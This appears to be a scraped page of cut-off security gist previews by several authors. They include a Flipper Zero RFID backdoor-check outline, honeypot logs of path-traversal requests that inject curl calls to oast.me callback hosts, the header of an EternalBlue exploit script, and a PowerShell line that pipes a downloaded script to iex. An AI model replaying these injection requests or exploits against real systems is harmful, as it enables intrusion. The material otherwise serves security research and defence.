dmaynor

Creating a Flipper Zero app to test for this attack involves writing a script that can interact with the RFID module on the Flipper Zero to perform the necessary steps. The Flipper Zero uses a scripting language called **.fap** (Flipper App) format, typically written in C or a high-level scripting language, but it also supports custom Python-like scripting with `flipperzero-tui`.

Here's a basic outline for creating an app that can check for the presence of the backdoor key on a MIFARE Classic card. Note that this is a simplified version and assumes some familiarity with Flipper Zero's development environment.

### **Step 1: Set Up the Development Environment**

1. **Install Flipper Zero SDK:** 
   - Follow the official [Flipper Zero documentation](https://github.com/flipperdevices/flipperzero-firmware) to set up the SDK and development environment.
   
2. **Clone the Flipper Zero Firmware:**

mistymntncop

// Build d8 using:
// a) Run once
//    git checkout 6f98fbe86a0d11e6c902e2ee50f609db046daf71
//    gclient sync
//    gn gen ./out/x64.debug
//    gn gen ./out/x64.release
//
// b) 
//    Debug Build:
//    ninja -C ./out/x64.debug d8

andrew-morris

Start Time, Stop Time, Src IP, Src Country, Src ASN Name, URI, URI Path
1705410897884,1705410913832,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code","/api/v1/totp/user-backup-code"
1705427130797,1705427132894,45.77.220.169,US,"AS-CHOOPA","<IP>/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection","/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection"
1705438981268,1705438981905,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me","/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me"
1705439136337,1705439136975,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjev7jug2jtnphga8igpw9kab6pazpi5.oast.pro","/api/v1/totp/user-backup-code/../../

olliencc

/*
VEH misuse detector for Microsoft Windows

Released as open source by NCC Group Plc - http://www.nccgroup.com/

Developed by Ollie Whitehouse, ollie dot whitehouse at nccgroup dot com

Released under AGPL see LICENSE for more information
*/

magoo

https://apps.fcc.gov/edocs_public/attachmatch/DOC-332911A1.pdf
https://archives.fbi.gov/archives/newark/press-releases/2011/former-at-t-contractor-arrested-charged-with-unauthorized-access-of-servers
https://www.justice.gov/archive/opa/pr/2009/January/09-at-033.html
https://www.justice.gov/archive/usao/nj/Press/files/pdffiles/2008/Craig%20Filed%20Complaint.pdf
https://www.justice.gov/usao-ndal/pr/former-wireless-phone-company-employees-charged-selling-customer-information
http://www.al.com/news/birmingham/index.ssf/2017/03/former_gardendale_att_employee.html
http://fortune.com/2016/09/27/verizon-phone-records-breach/
https://www.databreaches.net/fl-call-center-employee-and-7-others-charged-in-id-theft-fraud-scheme-involving-att-customer-info/
https://www.fbi.gov/contact-us/field-offices/miami/news/press-releases/first-defendant-sentenced-in-identity-theft-fraud-scheme-involving-personal-identifying-information-from-at-t-customer-files
http://www.latimes.com/business/technology/la-fi-tn-verizon-data-20170712-s

wdormann

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
 "DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
 "DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
 "DontUpdateLinks"=dword:00000001

worawit

#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket

'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

snare

😒🙅🙄

$thing for fun and profit
all your $thing are belong to $shutup
honey I $verbed the $thing
$thing demystified
$thing: a deep dive
$verb all the things
make $thing great again
$x and $y and $z, oh my!

alirobe

### 
###
### UPDATE: For Win 11, I recommend using this tool in place of this script: 
### https://christitus.com/windows-tool/
### https://github.com/ChrisTitusTech/winutil
### https://www.youtube.com/watch?v=6UQZ5oQg8XA
### iwr -useb https://christitus.com/win | iex
###
###

rawdigits

Blog post: Ryan Huber - Distributed Security Alerting
https://medium.com/several-people-are-coding

Video: Zane Lackey - Building a Modern Security Organization    
https://duo.com/blog/duo-tech-talk-building-a-modern-security-engineering-organization

Krebs on Security Blog
https://www.krebsonsecurity.com

Sony Breach